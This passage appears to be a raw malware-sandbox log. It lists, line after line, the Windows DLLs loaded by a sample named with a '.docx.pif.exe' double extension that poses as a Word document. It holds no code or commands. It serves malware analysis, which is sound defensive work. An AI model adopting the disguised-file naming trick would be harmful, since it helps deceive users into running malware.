              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: sppc.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: smartscreenps.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: nltdll.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: nltdll.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
